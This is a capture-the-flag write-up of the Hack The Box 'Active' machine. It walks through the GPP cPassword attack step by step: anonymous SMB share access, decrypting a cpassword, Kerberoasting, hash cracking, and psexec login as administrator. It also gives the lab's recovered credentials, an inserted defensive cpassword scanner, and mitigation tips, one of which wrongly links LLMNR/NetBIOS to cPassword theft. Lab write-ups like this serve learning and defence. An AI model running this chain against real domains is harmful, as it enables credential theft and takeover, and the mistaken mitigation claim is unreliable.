Unwrapping GPP: Exposing the cPassword Attack Vector using Active (HTB Machine)

Jinendar Kothari
5 min read · Aug 12, 2023


Welcome to another of my blog posts. In this post we will delve into a menacing class of network vulnerability: the targeted exploitation of cPasswords. As guardians of digital landscapes, it is imperative that we understand how attackers manipulate and breach Active Directory’s defenses.

What is GPP?

Imagine you’re the boss of a big company, and you have a bunch of computers that need to do specific things.

Now, instead of running around to each computer and setting everything up one by one (which would take forever!), you have a magic tool called “Group Policy Preferences” or GPP.

GPP is like your super assistant that helps you tell all the computers what to do, like where to put files, which programs to use, and what settings to follow. It’s like giving a secret code to all your computers so they know how to work together like a well-oiled team.

What made GPP vulnerable?

Well, the secret that GPP used to hold on to so tightly was revealed by accident. OOPS!!!!

Fig: An accident

GPP or Group Policy Preferences allowed admins to create policies using embedded credentials.

Most of the time these credentials were domain admin credentials, so recovering them allows an adversary to access a domain admin account.

These credentials were encrypted and placed in a “cPassword” attribute.

This password was stored in a Groups.xml file in SYSVOL (SYSTEM VOLUME) on each domain controller in the domain.

Unfortunately, the key to decrypt cPassword was released accidentally.

Imagine if you hid your chocolate stash in the cookie jar, and now everyone knows about it!

Although this vulnerability was patched in MS14-025, the patch does not undo previous uses of the feature.

This is almost 9–10 years old. However, if these older files were never deleted, then these passwords still exist and could still work in the environment.

Demonstration of cPassword Attack with Active (HTB Machine)

For demonstration purposes, we will be solving the HTB machine Active, which is vulnerable to this attack vector.

Fig: Active

Although this is a retired machine, you can access it along with some other retired machines through Hack The Box’s all-new Hackers’ Bootcamp.

Do not forget to add the Machine_IP and active.htb to the /etc/hosts file.

First we will perform an Nmap scan on the target machine.

nmap -Pn -A -T5 <Target-IP>
Fig: Enumeration with Nmap

As we can see, port 445 is open, so we will try to enumerate the SMB shares with smbclient.

smbclient -L \\\\<Target-IP>\\
Fig: SMB Shares enumeration via smbclient

As we can log in anonymously, we will now try to access the Replication share using smbclient.

smbclient \\\\<Target-IP>\\Replication
Fig: Accessing Replication SMB Share

We found something!!!

Let’s get it onto our attacker system with a simple command: mget *.

We will then analyze its contents on our system.

Fig: mget * to get all files.

Now, while navigating through the folders, we will find a file (Groups.xml) which contains a cpassword along with a username.

We will decrypt the obtained cpassword with gpp-decrypt.

gpp-decrypt <Cpassword-Hash>
Fig: gpp-decrypt

We got the following credentials, and we can use smbclient to connect to the machine and perform further enumeration.

UserName: active.htb\SVC_TGS
Password: GPPstillstandingStrong2k18

smbclient //<target-IP>/Users -U <USER>

Did you notice something? Of course you did. You are not a script kiddie like me.

With the obtained credentials for SVC_TGS, let’s perform some Kerberoasting.

For a perfect roast you need some hashes.

GetUserSPNs.py <Domain/Username:password> -dc-ip <ip of DC> -request
Fig: Get Dem Hashes

Now we will add the hash to a file and cook it with Hashcat.

hashcat -m 13100 <Hash File> <wordlist> -O
Fig: cracking Hashes with hashcat

And finally the password is served, which can be used to access the system as an Administrator via psexec.

psexec.py <Domain>/<username>:<password>@<Target-IP>

Now you can either gain access via smbclient first and then perform Kerberoasting, or you can directly perform Kerberoasting and access the system as administrator. Both approaches are fine.

Mitigation & Strategies

Here are some mitigation strategies to protect against GPP/cPassword attacks:

  • Regular Patching and Updates: Keep all systems, including domain controllers and client machines, up to date with the latest security patches and updates provided by Microsoft.
  • Use Strong and Unique Local Administrator Passwords: Configure strong and unique local administrator passwords for all machines to prevent attackers from using extracted cPasswords.
  • Use Group Policy Best Practices: Follow Microsoft’s best practices for Group Policy settings. Avoid storing sensitive information, like passwords, in Group Policy Preferences.
  • Enable LAPS (Local Administrator Password Solution): Implement Microsoft’s LAPS tool to automatically manage and rotate local administrator passwords on domain-joined machines.
  • Review and Remove LLMNR and NetBIOS: Disable Link-Local Multicast Name Resolution (LLMNR) and NetBIOS over TCP/IP to prevent attackers from using these protocols to extract cPasswords.
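A small check that backs the third item above, and the earlier point that old Groups.xml files keep cPasswords alive: an added Python scanner (example code, not from the post or from any tool it uses) that walks a SYSVOL-like directory and reports every GPP preference element still carrying a cpassword attribute, so the leftover preference can be removed. The sample Groups.xml content, the placeholder cpassword value and the attribute list are constructed for illustration.

```python
"""Added example: find leftover GPP cpassword attributes in a SYSVOL-like tree.
The sample XML and the placeholder cpassword below are constructed, not real data."""
import xml.etree.ElementTree as ET
from pathlib import Path

# GPP preference files that can carry embedded credentials.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attributes that name the account the cpassword belongs to, per file type.
ACCOUNT_ATTRS = ("userName", "username", "runAs", "accountName")


def find_cpasswords(xml_text: str, source: str = "<memory>") -> list[dict]:
    """Return one finding per element with a non-empty cpassword attribute."""
    findings = []
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return findings  # malformed file: nothing to report from it
    for elem in root.iter():
        cpw = elem.get("cpassword")
        if not cpw:  # attribute absent or blank (blank means no stored password)
            continue
        user = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "")
        findings.append({"file": source, "element": elem.tag,
                         "user": user, "cpassword_len": len(cpw)})
    return findings


def scan_sysvol(root_dir: str) -> list[dict]:
    """Walk root_dir recursively and scan only the known GPP preference files."""
    results = []
    for path in Path(root_dir).rglob("*.xml"):
        if path.name in GPP_FILES:
            text = path.read_text(encoding="utf-8", errors="replace")
            results.extend(find_cpasswords(text, str(path)))
    return results


# Constructed Groups.xml-style sample; the cpassword value is a placeholder.
SAMPLE_GROUPS_XML = r"""<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="active.htb\SVC_TGS">
    <Properties action="U" cpassword="PLACEHOLDER_CPASSWORD_VALUE"
        changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
        userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
"""

if __name__ == "__main__":
    for hit in find_cpasswords(SAMPLE_GROUPS_XML, "Groups.xml"):
        print(f"{hit['file']}: <{hit['element']}> stores a cpassword for {hit['user']}")
```

Point scan_sysvol at a copy of the Policies folder (for example \\<domain>\SYSVOL\<domain>\Policies mounted locally) and remove or recreate every preference it reports.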

Conclusion

As we draw the curtains on our journey through the intricate landscape of Group Policy Preferences (GPP) and the enigmatic cPassword attack vector, one thing becomes abundantly clear: the world of technology, while empowering, also demands vigilant protection.

Thank you for joining me on this enlightening expedition. As you continue your journey in the realm of cybersecurity, may your every click be shielded, your every keystroke fortified, and your digital explorations anchored in the spirit of responsible stewardship.
